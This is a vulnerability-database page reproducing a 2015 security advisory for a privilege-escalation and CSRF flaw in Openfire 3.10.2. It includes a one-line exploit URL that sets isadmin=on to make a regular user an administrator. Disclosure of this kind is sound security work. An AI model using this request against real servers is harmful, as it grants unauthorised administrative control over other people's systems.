Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormHyp3rlinxPACKETSTORM:133559
HistorySep 15, 2015 - 12:00 a.m.

Openfire 3.10.2 Privilege Escalation

2015-09-1500:00:00
hyp3rlinx
packetstormsecurity.com
22

EPSS

0.058

Percentile

93.4%

JSON
`[+] Credits: hyp3rlinx  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-PRIV-ESCALATION.txt  
  
  
  
Vendor:  
================================  
www.igniterealtime.org/projects/openfire  
www.igniterealtime.org/downloads/index.jsp  
  
  
  
Product:  
================================  
Openfire 3.10.2  
  
Openfire is a real time collaboration (RTC) server licensed under the Open  
Source Apache License.  
It uses the only widely adopted open protocol for instant messaging, XMPP  
(also called Jabber).  
  
  
  
Vulnerability Type:  
===================  
Privilege escalation  
  
  
  
CVE Reference:  
==============  
N/A  
  
  
  
  
Vulnerability Details:  
=====================  
No check is made when updating the user privileges, allowing regular user  
to become an admin.  
Escalation can be done remotely too if user is logged in as no CSRF token  
exist.  
  
  
  
  
  
Exploit code(s):  
===============  
  
Become admin!  
  
http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&[email protected]&isadmin=on  
  
  
  
  
Disclosure Timeline:  
=========================================================  
  
Vendor Notification: NA  
Sept 14, 2015 : Public Disclosure  
  
  
  
  
Exploitation Technique:  
=======================  
Local or Remote  
  
  
  
Severity Level:  
=========================================================  
High  
  
  
  
Description:  
==========================================================  
  
  
Request Method(s): [+] GET  
  
  
Vulnerable Product: [+] Openfire 3.10.2  
  
  
Vulnerable Parameter(s): [+] isadmin  
  
  
Affected Area(s): [+] Admin  
  
  
===========================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author.  
The author is not responsible for any misuse of the information contained  
herein and prohibits any malicious use of all security related information  
or exploits by the author or elsewhere.  
  
by hyp3rlinx  
`

Related

prion 1
cvelist 1
exploitdb 1
cve 1
nvd 1
nessus 1
gentoo 1
archlinux 1
openvas 1
prion
prion
Code injection
2015-10-05 15:59:00
cvelist
cvelist
CVE-2015-7707
2015-10-05 15:00:00
exploitdb
exploitdb
Openfire 3.10.2 - Privilege Escalation
2015-09-15 00:00:00
cve
cve
CVE-2015-7707
2015-10-05 15:59:03
nvd
nvd
CVE-2015-7707
2015-10-05 15:59:03
nessus
nessus
GLSA-201612-50 : Openfire: Multiple vulnerabilities
2017-01-03 00:00:00
gentoo
gentoo
Openfire: Multiple vulnerabilities
2016-12-31 00:00:00
archlinux
archlinux
[ASA-201612-21] openfire: multiple issues
2016-12-23 00:00:00
openvas
openvas
OpenFire <= 3.10.2 Multiple Vulnerabilities
2015-10-19 00:00:00

EPSS

0.058

Percentile

93.4%

JSON
Related for PACKETSTORM:133559
prion1cvelist1exploitdb1cve1nvd1nessus1gentoo1archlinux1openvas1